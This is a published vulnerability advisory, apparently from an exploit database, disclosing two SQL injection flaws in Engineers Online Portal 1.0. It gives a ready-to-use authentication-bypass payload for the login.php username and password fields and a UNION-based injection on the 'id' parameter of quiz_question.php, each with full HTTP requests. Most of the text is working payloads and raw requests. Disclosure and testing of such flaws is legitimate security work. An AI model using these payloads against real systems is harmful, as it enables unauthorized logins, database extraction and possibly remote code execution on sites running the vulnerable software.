Engineers Online Portal 1.0 SQL Injection

`# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Authentication Bypass  
# Exploit Author: Alon Leviev  
# Date: 22-10-2021  
# Category: Web application  
# Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip  
# Version: 1.0  
# Tested on: Kali Linux   
# Vulnerable page: login.php  
# VUlnerable parameters: "username", "password"  
  
Technical description:  
An SQL Injection vulnerability exists in the Engineers Online Portal login form which can allow an attacker to bypass authentication.   
  
Steps to exploit:  
1) Navigate to http://localhost/nia_munoz_monitoring_system/login.php  
2) Insert your payload in the user or password field   
3) Click login  
  
Proof of concept (Poc):  
The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form -   
' OR '1'='1';-- -  
  
---   
  
POST /nia_munoz_monitoring_system/login.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 41  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/nia_munoz_monitoring_system/  
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9  
  
username='+or+'1'%3D'1'%3B--+-&password=sqli  
  
OR  
  
POST /nia_munoz_monitoring_system/login.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 44  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/nia_munoz_monitoring_system/  
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9  
  
username=sqli&password='+or+'1'%3D'1'%3B--+-  
  
---  
  
  
-----------------  
  
# Exploit Title: Engineers Online Portal 1.0 - 'id' SQL Injection   
# Exploit Author: Alon Leviev  
# Date: 22-10-2021  
# Category: Web application  
# Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip  
# Version: 1.0  
# Tested on: Kali Linux   
# Vulnerable page: quiz_question.php  
# Vulnerable Parameter: "id"  
  
Technical description:  
An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the sql query performed.  
As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server.   
  
Steps to exploit:  
1) Navigate to http://localhost/nia_munoz_monitoring_system/quiz_question.php  
2) Insert your payload in the id parameter  
  
Proof of concept (Poc):  
The following payload will allow you to extract the MySql server version running on the web server -  
' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- -  
  
---  
  
GET /nia_munoz_monitoring_system/quiz_question.php?id=3%27%20union%20select%20NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL--%20- HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9  
Upgrade-Insecure-Requests: 1  
  
---  
  
`